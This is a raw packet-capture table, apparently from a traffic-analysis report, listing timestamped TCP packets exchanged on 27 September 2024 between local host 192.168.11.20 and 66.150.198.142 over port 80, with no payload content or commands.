                                                          Sep 27, 2024 12:58:44.285397053 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285451889 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285511971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285518885 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285588026 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285645008 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285686016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285763979 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285820961 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285852909 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285852909 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.285912037 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.285969019 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286026955 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286034107 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286102057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286158085 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286194086 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286194086 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286194086 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286195040 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286266088 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286320925 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286362886 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286362886 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286411047 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286468029 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286524057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286534071 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286535025 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286608934 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286664963 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286704063 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286704063 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286704063 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286765099 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286819935 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286870956 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.286895037 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.286953926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287009954 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287044048 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287044048 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287139893 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287198067 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287211895 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287277937 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287333012 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287383080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287436962 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287494898 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287552118 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287564993 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287564993 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287642002 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287698030 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287723064 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287723064 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287787914 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287843943 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287893057 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287893057 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287893057 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.287936926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.287995100 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288050890 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288063049 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288130999 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288239956 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288254023 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288254023 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288254023 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288254976 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288357973 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288403034 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288403034 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288444996 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288501978 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288556099 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288572073 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288635969 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288692951 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288741112 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288768053 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288825989 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288880110 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.288914919 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288914919 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288914919 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288914919 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.288990021 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289047003 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289083004 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289083004 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289083958 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289144993 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289201021 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289251089 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289274931 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289333105 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289388895 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289422989 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289422989 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289423943 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289488077 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289542913 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289592028 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289619923 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289689064 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289705038 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289720058 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289735079 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289750099 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289758921 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289758921 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289758921 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289758921 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289782047 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289798021 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289813042 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289828062 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289843082 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289858103 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289872885 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.289928913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289928913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289928913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289928913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289928913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289928913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.289928913 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290098906 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290102959 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290106058 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290107012 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290107965 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290107965 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290108919 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290108919 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290110111 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290111065 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290111065 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290112019 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290112019 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290112972 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290113926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290131092 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290146112 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290270090 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290270090 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290270090 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290270090 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290270090 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290283918 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290286064 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290286064 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290287018 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290287971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290287971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290288925 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290290117 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290302992 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290321112 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290335894 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290350914 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290365934 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290380955 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290395975 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290410995 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290426016 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290441990 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290457010 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290472031 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290489912 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290489912 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290489912 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290489912 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290489912 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290489912 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290489912 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290491104 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290512085 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290512085 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290512085 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290523052 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290539026 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290554047 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290569067 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290584087 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290600061 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.290656090 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290827036 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290827036 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290827036 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.290994883 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.399995089 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.400085926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.400206089 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.400448084 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.400449038 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.414592981 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.414684057 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.414756060 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.414764881 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.414855003 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.414906025 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.414963007 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.414988995 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.414988995 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415034056 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415076971 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415133953 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415189028 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415211916 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415280104 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415303946 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415303946 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415303946 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415388107 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415445089 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415499926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415523052 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415523052 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415589094 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415644884 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415692091 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415692091 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415692091 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415741920 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415801048 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415860891 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.415868998 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415868998 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.415946007 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416002035 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416030884 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416030884 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416090965 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416146040 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416218042 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416218042 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416218996 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416326046 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416372061 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416418076 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416475058 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416531086 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416543007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416543007 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416620016 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416678905 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416711092 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416711092 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416769028 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416825056 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416882992 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.416893005 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416893959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.416893959 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417062044 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417074919 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417074919 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417074919 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417162895 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417221069 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417227983 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417298079 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417365074 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417392969 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417392969 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417483091 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417541981 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417560101 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417620897 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417676926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417736053 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417742968 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417742968 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417819977 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417875051 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.417907953 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417907953 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.417973042 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418028116 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418072939 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418072939 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418138981 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418198109 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418241024 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418277979 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418334007 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418390036 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418411016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418411016 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418479919 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.418586969 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418586969 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418751955 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.418751955 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.515754938 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.516067982 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534173012 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534259081 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534324884 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534387112 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534442902 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534497976 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534521103 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534521103 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534522057 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534610033 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534666061 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534687996 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534745932 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534801960 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534859896 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.534871101 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534871101 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534871101 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534871101 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.534965038 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535021067 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535031080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535031080 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535106897 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535162926 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535198927 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535198927 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:44.535254002 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:44.535311937 CEST804978366.150.198.142192.168.11.20
